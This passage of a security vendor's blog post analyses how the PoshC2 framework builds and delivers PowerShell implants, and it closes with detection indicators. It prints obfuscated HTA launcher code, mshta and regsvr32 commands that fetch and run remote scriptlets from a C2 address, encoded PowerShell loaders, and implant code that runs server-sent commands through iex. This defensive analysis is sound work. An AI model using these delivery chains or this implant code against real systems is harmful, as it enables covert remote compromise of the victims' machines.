<![CDATA[ its static fingerprint. What it did not include, however, was an
investigation of the delivery methods using proxy tools such as regsvr32.exe or
mshta.exe and details of the underlying implementation. In this blog post, we
plan to fill this gap by looking into the details of the PowerShell implant ]]>
<![CDATA[ generation phase; we will detail the main implementations and conclude
with some detection suggestions.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<h2 aria-level="1"><span data-contrast="none">Generation of PowerShell Impl ]]>
<![CDATA[ ants</span></h2> <p><span data-contrast="auto">As with any other C2
framework, generating an implant is a process that is tightly coupled with
configuring the server. In PoshC2, the user bootstraps the process using the
commands </span><i><span data-contrast="auto">posh-project -n project-name</span
]]>
<![CDATA[ ></i><span data-contrast="auto">, </span><i><span
data-contrast="auto">posh-config project-name,</span></i><span
data-contrast="auto"> and </span><i><span
data-contrast="auto">posh-server.</span></i><span
data-contrast="auto"> </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&qu ]]>
<![CDATA[ ot;:160,&quot;335559740&quot;:259}"> </span></p> <p><span
data-contrast="auto">The command</span><i><span data-contrast="auto">
posh-config</span></i><span data-contrast="auto"> opens the configuration file
for editing (default configuration can be seen in </span><span
data-contrast="auto">Figure 1 ]]>
<![CDATA[ </span><span data-contrast="auto">), which allows setting up many
parameters, including </span><i><span
data-contrast="auto">PayloadCommsHost</span></i><span data-contrast="auto">,
which contains a list of C2 addresses that the server would listen on.  For
convenience, we will be querying the gener ]]>
<![CDATA[ ated backend URLs on the same host of the server, therefore we will
use the default value </span><i><span
data-contrast="auto">https://127.0.0.1</span></i><span data-contrast="auto"> as
the C2 URL.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:2
]]>
<![CDATA[ 59}"> </span></p> <p><a
href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.57.49-AM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83406"
src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.57.49-AM-1024x579.png"
alt ]]>
<![CDATA[ ="" width="800" height="452"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.57.49-AM-1024x579.png
1024w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.57.49-AM-300x170.png
300w, https://blogs.vmware.com/security/files/2023/03/Scree ]]>
<![CDATA[ n-Shot-2023-03-24-at-11.57.49-AM-768x434.png 768w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.57.49-AM-1536x868.png
1536w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.57.49-AM-600x339.png
600w, https://blogs.vmware.com/security/files ]]>
<![CDATA[ /2023/03/Screen-Shot-2023-03-24-at-11.57.49-AM.png 1610w"
sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><i><span
data-contrast="none">Figure </span></i><i><span
data-contrast="none">1</span></i><i><span data-contrast="none">: Configuration
file, opened by posh-config.</span></i><span data-cc ]]>
<![CDATA[
p-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="auto">The command</span><i><span data-contrast="auto">
posh-server</span></i><span data-contrast="auto">, as the name suggests ]]>
<![CDATA[ , starts the server. This command also generates over 100
modifications of payloads, which are dropped in
/var/poshc2/project-name/payloads.</span></p> <p><a
href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.59.22-AM.png"><img
decoding="async" loading="lazy" class="a ]]>
<![CDATA[ lignnone wp-image-83407"
src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.59.22-AM-1024x771.png"
alt="" width="800" height="603"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.59.22-AM-1024x771.png
1024w, https://blogs.vmware.com ]]>
<![CDATA[
/security/files/2023/03/Screen-Shot-2023-03-24-at-11.59.22-AM-300x226.png 300w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.59.22-AM-768x578.png
768w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.59.22-AM-1536x1157.png
1536w, https://b ]]>
<![CDATA[
logs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.59.22-AM-600x452.png
600w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.59.22-AM.png
1596w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><em><span
class="TextRun SCXW172436151 BCX2" lang="EN- ]]>
<![CDATA[ US" xml:lang="EN-US" data-contrast="none"><span class="NormalTextRun
SCXW172436151 BCX2" data-ccp-parastyle="caption">Figure </span></span><span
class="FieldRange SCXW172436151 BCX2"><span class="TextRun SCXW172436151 BCX2"
lang="EN-US" xml:lang="EN-US" data-contrast="none"><span class="NormalTextRu ]]>
<![CDATA[ n SCXW172436151 BCX2"
data-ccp-parastyle="caption">2</span></span></span><span class="TextRun
SCXW172436151 BCX2" lang="EN-US" xml:lang="EN-US" data-contrast="none"><span
class="NormalTextRun SCXW172436151 BCX2" data-ccp-parastyle="caption">:
</span><span class="NormalTextRun SCXW172436151 BCX2" dat ]]>
<![CDATA[ a-ccp-parastyle="caption">PoshC2 suggests different methods of
execution of a PowerShell implant, created by the posh-server
command.</span></span></em></p> <p><span data-contrast="auto">As shown in
</span><span data-contrast="auto">Figure 2</span><span data-contrast="auto">,
PoshC2 suggests six dif ]]>
<![CDATA[ ferent methods for executing a PowerShell implant: (1) straight from
the disk, after renaming the raw implant (stored by PoshC2 in payload.txt) and
changing the extension to .ps1; (2) passed to PowerShell as a command line
argument (using the file payload.bat generated by PoshC2); (3) delivered via ]]>
<![CDATA[ a short PowerShell one-liner; (4) executed by mshta.exe as an HTA
payload; (5) as a scriptlet pulled from the Internet by regsvr32.exe; (6) or,
again, executed by mshta.exe but in this instance with the help of an inline
VBScript.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&
]]>
<![CDATA[ quot;:160,&quot;335559740&quot;:259}"> </span></p> <h2
aria-level="1"><span data-contrast="none">Execution via Proxy Tools</span></h2>
<p><span data-contrast="auto">Using Living Off the Land Binaries (LOLBins),
e.g., mshta.exe and regsvr32.exe, is a widely adopted MITRE technique (</span><a
href="h ]]>
<![CDATA[ ttps://attack.mitre.org/techniques/T1218/"><span
data-contrast="none">T.1218</span></a><span data-contrast="auto">) often used to
break the malware delivery process into a chain of events designed to hinder
detection. PoshC2 can, for example, rely on mshta.exe to proxy the execution of
malicious VBS ]]>
<![CDATA[ cripts, JScripts, and PowerShell scripts. The technique is implemented
by generating a file called Launcher.hta. This file features obfuscated strings
(“Wscript.Shell” is split into chunks for example) and a Base64-encoded
PowerShell implant, both simple yet effective techniques to bypass static ]]>
<![CDATA[ detection:  </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><strong><i>&lt;script&gt;</i></strong></p> <p><strong><i>ao=new
ActiveXObject(&#8220;W&#8221;+&#8221;S&#8221;+&#8221;cr&#8221;+&#8221;ip&#8221;+&#8221;t.&#8221;
]]>
<![CDATA[
+&#8221;Sh&#8221;+&#8221;e&#8221;+&#8221;l&#8221;+&#8221;l&#8221;);</i></strong></p>
<p><strong><i>ao.run(&#8216;powershell -exec bypass -Noninteractive -windowstyle
hidden -e
SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUg</i><i>BlAGEA</i></strong></p>
<p><strong><i>ZABlAHIAKAAoA ]]>
<![CDATA[
E4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMA</i></strong></p>
<p><strong><i>&lt;&#8230;&gt;</i></strong></p>
<p><strong><i>G0AcAByAGUAcwBzACkAKQAsAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdA</i></strong></p>
<p><strong><i>DoAOgBBAFMAQwBJAEkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQ ]]>
<![CDATA[ AKAApAA==&#8217;, 0);window.close();</i></strong></p>
<p><strong><i>&lt;/script&gt;</i></strong><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="auto">Execution of powershell.exe with lo ]]>
<![CDATA[ ng arguments (in our case the Base64-encoded implant is more than 6000
characters long) should be considered a strong indicator of suspicious
activity. </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="aut ]]>
<![CDATA[ o">Malicious HTA files can also be executed through an inline script.
This hides the code of the implant and thereby also reduces the risk of a
signature able to target it:</span></p> <p><strong><i>mshta.exe
&#8216;vbscript:GetObject(&#8220;script:https://127.0.0.1/Philips/v902/_cs&#8221;)(window.cl
]]>
<![CDATA[ ose)&#8217;</i> </strong></p> <p><span data-contrast="auto">In
comparison to Launcher.hta, the code of the HTA payload, retrieved by the inline
VBScript, relies on the </span><i><span
data-contrast="auto">Shell.Application</span></i><span data-contrast="auto">
ActiveX object rather than </span><i>< ]]>
<![CDATA[ span data-contrast="auto">Wscript.Shell</span></i><span
data-contrast="auto">; also, tags like </span><i><span
data-contrast="auto">Scriptlet</span></i><span data-contrast="auto"> and
</span><i><span data-contrast="auto">Script</span></i><span
data-contrast="auto"> are now mangled; however, the same ]]>
<![CDATA[ PowerShell Base64-encoded command to execute the implant is used. All
these techniques, again, are employed to make static analysis more
difficult:</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><strong><i>john@ubuntu:~$ cur ]]>
<![CDATA[ l -k https://127.0.0.1/Philips/v902/_cs</i> </strong></p>
<p><strong><i>&lt;sCrIptlEt&gt;&lt;scRIPt&gt;</i></strong></p>
<p><strong><i>a=new
ActiveXObject(&#8220;Shell.Application&#8221;).ShellExecute(&#8220;powershell.exe&#8221;,&#8221;
-exec bypass -Noninteractive -windowstyle hidden -e SQBFAFgAK ]]>
<![CDATA[ ABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZ</i></strong></p>
<p><strong><i>QBhAG0AUgBlAGEAZABlAHIAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTA</i></strong></p>
<p><strong><i>HkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMA</i></strong></p>
<p><strong><i>&lt;&#8230;&gt;</i></strong></p> <p><strong><i>G0AcAB ]]>
<![CDATA[
yAGUAcwBzACkAKQAsAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBB</i></strong></p>
<p><strong><i>AFMAQwBJAEkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApAA==&#8221;,&#8221;&#8221;,&#8221;open&#8221;,&#8221;0&#8243;);</i></strong></p>
<p><strong><i>&lt;/scRIPt&gt;&lt;/sCrIptlEt&gt;</i> </strong></p> <p><spa ]]>
<![CDATA[ n data-contrast="auto">Another method to proxy PowerShell execution is
to use regsvr32.exe in combination with scrobj.dll, as shown below.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><strong><i>regsvr32 /s /n /u /i:https ]]>
<![CDATA[ ://127.0.0.1/Philips/v902/_rg scrobj.dll</i> </strong></p> <p><span
data-contrast="auto">Loaded by regsvr32.exe, scrobj.dll will download and
execute the scriptlet, hosted by the server component of PoshC2. This scriptlet
uses the</span><i><span data-contrast="auto"> Shell.Application</span></i><sp
]]>
<![CDATA[ an data-contrast="auto"> ActiveX object to execute powershell.exe with
the Base64-encoded implant execution command passed as an argument:</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><strong><i>john@ubuntu:~$ curl -k htt ]]>
<![CDATA[ ps://127.0.0.1/Philips/v902/_rg</i> </strong></p>
<p><strong><i>&lt;?XML version=&#8221;1.0&#8243;?&gt;</i></strong></p>
<p><strong><i>&lt;scriptlet&gt;</i></strong></p>
<p><strong><i>&lt;registration</i></strong></p> <p><strong><i>   
progid=&#8221;PoC&#8221;</i></strong></p> <p><strong><i>   ]]>
<![CDATA[   classid=&#8221;{F0001111-0000-0000-0000-0000FEEDACDC}&#8221;
&gt;</i></strong></p> <p><strong><i>&lt;script
language=&#8221;VBScript&#8221;&gt;</i></strong></p> <p><strong><i>Dim
ghgfhgfh</i></strong></p> <p><strong><i>set ghgfhgfh =
CreateObject(&#8220;shell.application&#8221;)</i></strong></p> ]]>
<![CDATA[ <p><strong><i>ghgfhgfh.ShellExecute &#8220;powershell.exe&#8221;,
&#8221; -exec bypass -Noninteractive -windowstyle hidden -e
SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUg</i></strong></p>
<p><strong><i>BlAGEAZABlAHIAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE
]]>
<![CDATA[ M</i></strong></p> <p><strong><i>&lt;&#8230;&gt;</i></strong></p>
<p><strong><i>GQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQAsAFsAVABlAHgAdAAuAEU</i></strong></p>
<p><strong><i>AbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApAA==&#8221;,
&#8220;&#8221;, &#8220;open&#822 ]]>
<![CDATA[ 1;, 0</i></strong></p> <p><strong><i>&lt;/script&gt;</i></strong></p>
<p><strong><i>&lt;/registration&gt;</i></strong></p>
<p><strong><i>&lt;/scriptlet&gt;</i> </strong></p> <p><span
data-contrast="auto">Both HTA code and scriptlets feature the same
powershell.exe command line parameters, including ]]>
<![CDATA[ the Base64-encoded PowerShell command that ultimately executes the
implant. PoshC2 stores the whole command line inside payload.bat, which can be
either executed on a remote system as-is or become part of a bigger execution
chain. The Base64-encoded PowerShell command contains another layer of obfu ]]>
<![CDATA[ scation – another Base64-encoded PowerShell script that is also
packed:</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><strong><i>IEX(New-Object IO.StreamReader((New-Object
System.IO.Compression.GzipStream([IO.MemoryStrea ]]>
<![CDATA[
m][Convert]::FromBase64String(&#8216;H4sIAIec/GMC/51XW3PayBJ+16+YVekBJUhc4mDHFFVry2RNObYpIM7uUq6tQWpggpCU0SiYZfnv2z0jLnE2l</i> </strong></p>
<p><strong><i>&lt;&#8230;&gt;</i></strong></p>
<p><strong><i>BXQg3I0aEY9pesli2Yz5M7+vtHe35Xg7s9DxaXyhjFAZtQdpJTKzf8XrGmEUKjMjm4dy9ta/wJPgY69ig4AAA==&#8217;),[
]]>
<![CDATA[
IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()</i></strong><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"><br
/> </span></p> <p><span data-contrast="auto">The packed code is the main Pow ]]>
<![CDATA[ erShell implant (which can be found inside payload.txt). Before diving
into the details of its implementation, there is one last delivery method to
analyze: the PowerShell stager.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
]]>
<![CDATA[ <h2 aria-level="1"><span data-contrast="none">Execution via PowerShell
Stagers</span><span
data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}"> </span></h2>
<p><span data-contra ]]>
<![CDATA[ st="auto">Similarly to the inline scripts used with mshta.exe and
regsvr32.exe, PoshC2 provides a short PowerShell one-liner to download and
execute the main PowerShell implant. As </span><span data-contrast="auto">Figure
3</span><span data-contrast="auto"> highlights, most of the Base64-encoded com
]]>
<![CDATA[ mand does not change at all, which makes it a perfect candidate for a
detection rule.</span></p> <p><a
href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.49.44-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83408"
src="https://blogs.vmware.com/ ]]>
<![CDATA[
security/files/2023/03/Screen-Shot-2023-03-24-at-12.49.44-PM-1024x159.png"
alt="" width="800" height="124"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.49.44-PM-1024x159.png
1024w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.49
]]>
<![CDATA[ .44-PM-300x47.png 300w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.49.44-PM-768x119.png
768w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.49.44-PM-600x93.png
600w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-2 ]]>
<![CDATA[ 4-at-12.49.44-PM.png 1506w" sizes="(max-width: 800px) 100vw, 800px"
/></a></p> <p><i><span data-contrast="none">Figure </span></i><i><span
data-contrast="none">3</span></i><i><span data-contrast="none">: Two different
builds of the PowerShell one-liner.</span></i></p> <p><span
data-contrast="auto">T ]]>
<![CDATA[ he Base64-encoded command employs </span><i><span
data-contrast="auto">System.Net.WebClient</span></i><span data-contrast="auto">
to download the main PowerShell implant, which is later executed with the
</span><i><span data-contrast="auto">IEX</span></i><span data-contrast="auto">
command. As shown ]]>
<![CDATA[ in the figure below, the URL is the only parameter that is responsible
for the changes in the Base64 encoding.</span></p> <p><a
href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.56.48-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83409" src= ]]>
<![CDATA[
"https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.56.48-PM-1024x66.png"
alt="" width="800" height="52"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.56.48-PM-1024x66.png
1024w, https://blogs.vmware.com/security/files/2023/03/Screen-S ]]>
<![CDATA[ hot-2023-03-24-at-12.56.48-PM-300x19.png 300w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.56.48-PM-768x49.png
768w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.56.48-PM-1536x99.png
1536w, https://blogs.vmware.com/security/files/2023/ ]]>
<![CDATA[ 03/Screen-Shot-2023-03-24-at-12.56.48-PM-2048x132.png 2048w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.56.48-PM-600x39.png
600w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><i><span
data-contrast="none">Figure </span></i><i><span data-contrast="none">4</s ]]>
<![CDATA[ pan></i><i><span data-contrast="none">: Two different builds of the
PowerShell one-liner (decoded Base64 command).</span></i><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}"> </span></p>
<p><span dat ]]>
<![CDATA[ a-contrast="auto">PoshC2 replies with the Base64-encoded payload.txt
to every download attempt coming from the one-liner</span><i><span
data-contrast="auto">:</span></i><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><strong><i>jo ]]>
<![CDATA[ hn@ubuntu:~$ curl -k
https://127.0.0.1/Philips/v902/_rp</i></strong></p>
<p><strong><i>W1N5c3RlbS5OZXQuU2VydmljZVBvaW50TWFuYWdlcl06OlNlcnZlckNlcnRpZmljYXRlVmFsaWRhd</i></strong></p>
<p><strong><i>GlvbkNhbGxiYWNrID0geyR0cnVlfQokZGY9QCgiIikKJGg9IiIKJHNjPSIiCiR1cmxzPUAoImh0dHBzOi8v</i></strong></p>
<p> ]]>
<![CDATA[ <strong><i>&lt;&#8230;&gt;</i></strong></p>
<p><strong><i>1pdCAtMTsKICAgICAgICBwcmltZXJzCiAgICAgICAgU3RhcnQtU2xlZXAgJHdhaXQKICAgICAgICAk</i></strong></p>
<p><strong><i>d2FpdCA9ICR3YWl0ICogMjsKICAgIH0KfQplbHNlCnsKICAgIHByaW1lcnMKfQo=</i></strong></p>
<h2 aria-level="1"><span data-contrast="none">The ]]>
<![CDATA[ PowerShell Implant</span></h2> <p><span data-contrast="auto">Full
analysis of the main implant (e5f2b83f05f6210410f52d59ef50357a55dc2af5) reveals
the following details (as a reminder, PoshC2 stores the non-obfuscated
PowerShell implant inside payload.txt). First off, the code disables certificate
ve ]]>
<![CDATA[ rification (as the attackers often use self-signed SSL certificates,
another common indicator of compromise). It also contains a list of C2 URLs and
a URI:</span></p>
<p><strong><i>[System.Net.ServicePointManager]::ServerCertificateValidationCallback
= {$true}</i></strong></p> <p><strong><i>$df=@(&# ]]>
<![CDATA[ 8220;&#8221;)</i></strong></p>
<p><strong><i>$h=&#8221;&#8221;</i></strong></p>
<p><strong><i>$sc=&#8221;&#8221;</i></strong></p>
<p><strong><i>$urls=@(&#8220;https://127.0.0.1&#8221;)</i></strong></p>
<p><strong><i>$curl=&#8221;/cisben/marketq/&#8221;</i></strong></p>
<p><strong><i>$s=$urls[0]</i>< ]]>
<![CDATA[ /strong></p> <p><span data-contrast="auto">The URI, stored in
</span><i><span data-contrast="auto">$curl</span></i><span
data-contrast="auto">, is randomly taken from the file PoshC2/resources/urls.txt
(shown in </span><span data-contrast="auto">Figure 5</span><span
data-contrast="auto">). The prese ]]>
<![CDATA[ nce of one of these strings in the URL is another indicator of
compromise that can be used by a detection rule.</span></p> <p><a
href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.59.48-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83410" src= ]]>
<![CDATA[
"https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.59.48-PM-888x1024.png"
alt="" width="800" height="922"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.59.48-PM-888x1024.png
888w, https://blogs.vmware.com/security/files/2023/03/Screen ]]>
<![CDATA[ -Shot-2023-03-24-at-12.59.48-PM-260x300.png 260w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.59.48-PM-768x886.png
768w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.59.48-PM-600x692.png
600w, https://blogs.vmware.com/security/files/20 ]]>
<![CDATA[ 23/03/Screen-Shot-2023-03-24-at-12.59.48-PM.png 1006w"
sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><i><span
data-contrast="none">Figure </span></i><i><span
data-contrast="none">5</span></i><i><span data-contrast="none">: Set of rotated
URIs.</span></i><span data-ccp-props="{&quot;201341983 ]]>
<![CDATA[
&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="auto">Interaction between the implant and the server is
encrypted with AES, and the resulting byte stream is further encoded in Base64.
The implant has ]]>
<![CDATA[ three functions to perform encryption – </span><i><span
data-contrast="auto">CAM</span></i><span data-contrast="auto"> (initializes the
crypto provider), </span><i><span data-contrast="auto">ENC</span></i><span
data-contrast="auto"> (encrypts data), and </span><i><span
data-contrast="auto">DEC</s ]]>
<![CDATA[ pan></i><span data-contrast="auto"> (decrypts data):</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><strong><i>function CAM ($key,$IV){</i></strong></p> <p><strong><i>try {$a =
New-Object &#8220;System.Security.Cryptography ]]>
<![CDATA[ .RijndaelManaged&#8221;</i></strong></p> <p><strong><i>} catch {$a =
New-Object
&#8220;System.Security.Cryptography.AesCryptoServiceProvider&#8221;}</i></strong></p>
<p><strong><i>$a.Mode =
[System.Security.Cryptography.CipherMode]::CBC</i></strong></p>
<p><strong><i>$a.Padding = [System.Security.Cr ]]>
<![CDATA[ yptography.PaddingMode]::Zeros</i></strong></p>
<p><strong><i>$a.BlockSize = 128</i></strong></p> <p><strong><i>$a.KeySize =
256</i></strong></p> <p><strong><i>if ($IV)</i></strong></p>
<p><strong><i>{</i></strong></p> <p><strong><i>if ($IV.getType().Name -eq
&#8220;String&#8221;)</i></strong></p> < ]]>
<![CDATA[ p><strong><i>{$a.IV =
[System.Convert]::FromBase64String($IV)}</i></strong></p>
<p><strong><i>else</i></strong></p> <p><strong><i>{$a.IV = $IV}</i></strong></p>
<p><strong><i>}</i></strong></p> <p><strong><i>if ($key)</i></strong></p>
<p><strong><i>{</i></strong></p> <p><strong><i>if ($key.getType() ]]>
<![CDATA[ .Name -eq &#8220;String&#8221;)</i></strong></p> <p><strong><i>{$a.Key
= [System.Convert]::FromBase64String($key)}</i></strong></p>
<p><strong><i>else</i></strong></p> <p><strong><i>{$a.Key =
$key}</i></strong></p> <p><strong><i>}</i></strong></p>
<p><strong><i>$a}</i></strong></p> <p><strong><i>fun ]]>
<![CDATA[ ction ENC ($key,$un){</i></strong></p> <p><strong><i>$b =
[System.Text.Encoding]::UTF8.GetBytes($un)</i></strong></p> <p><strong><i>$a =
CAM $key</i></strong></p> <p><strong><i>$e =
$a.CreateEncryptor()</i></strong></p> <p><strong><i>$f =
$e.TransformFinalBlock($b, 0, $b.Length)</i></strong></p> <p> ]]>
<![CDATA[ <strong><i>[byte[]] $p = $a.IV + $f</i></strong></p>
<p><strong><i>[System.Convert]::ToBase64String($p)</i></strong></p>
<p><strong><i>}</i></strong></p> <p><strong><i>function DEC
($key,$enc){</i></strong></p> <p><strong><i>$b =
[System.Convert]::FromBase64String($enc)</i></strong></p> <p><strong>< ]]>
<![CDATA[ i>$IV = $b[0..15]</i></strong></p> <p><strong><i>$a = CAM $key
$IV</i></strong></p> <p><strong><i>$d = $a.CreateDecryptor()</i></strong></p>
<p><strong><i>$u = $d.TransformFinalBlock($b, 16, $b.Length &#8211;
16)</i></strong></p>
<p><strong><i>[System.Text.Encoding]::UTF8.GetString([System.Convert]: ]]>
<![CDATA[
:FromBase64String([System.Text.Encoding]::UTF8.GetString($u).Trim([char]0)))}</i></strong></p>
<p><span data-contrast="auto">After sending a request to the C2 server,
</span><i><span data-contrast="auto">primern</span></i><span
data-contrast="auto"> verifies the response by looking for the presence ]]>
<![CDATA[ of the “*key*” string. If the string is present, then the code
executes the received PowerShell code with the help of </span><i><span
data-contrast="auto">iex </span></i><span data-contrast="auto">(an alias for the
</span><i><span data-contrast="auto">Invoke-Expression</span></i><span
data-contr ]]>
<![CDATA[ ast="auto"> cmdlet):</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><strong><i>$primern = (Get-Webclient -Cookie
$pp).downloadstring($script:s)</i> </strong></p> <p><strong><i>$p = dec -key
KgVKnyH0ZlTk8KlGhp6XpWOY7i6IS+K4 ]]>
<![CDATA[ 7yuVBY0/xR4= -enc $primern</i></strong></p> <p><strong><i>if ($p -like
&#8220;*key*&#8221;) {$p| iex}</i> </strong></p> <p><span
data-contrast="auto">The combination of specific functions and strings, which
have been used in the code (e.g., ServerCertificateValidationCallback,
AesCryptoServiceProvi ]]>
<![CDATA[ der, FromBase64String, ToBase64String, System.Net.WebProxy, *key*,
System.Net.WebClient) creates a unique fingerprint that can be used to detect
the implant.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contras ]]>
<![CDATA[ t="auto">Every build of a PowerShell implant updates three parameters:
URI, encryption key, and decryption key (see </span><span
data-contrast="auto">Figure 6</span><span data-contrast="auto">).</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}
]]>
<![CDATA[ "> </span></p> <p><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><a
href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.03.01-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83411" src="https: ]]>
<![CDATA[
//blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.03.01-PM-1024x463.png"
alt="" width="800" height="362"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.03.01-PM-1024x463.png
1024w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-20 ]]>
<![CDATA[ 23-03-24-at-1.03.01-PM-300x136.png 300w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.03.01-PM-768x347.png
768w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.03.01-PM-1536x695.png
1536w, https://blogs.vmware.com/security/files/2023/03/Scr ]]>
<![CDATA[ een-Shot-2023-03-24-at-1.03.01-PM-600x271.png 600w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.03.01-PM.png
1910w" sizes="(max-width: 800px) 100vw, 800px" /></a></span></p> <p><i><span
data-contrast="none">Figure </span></i><i><span
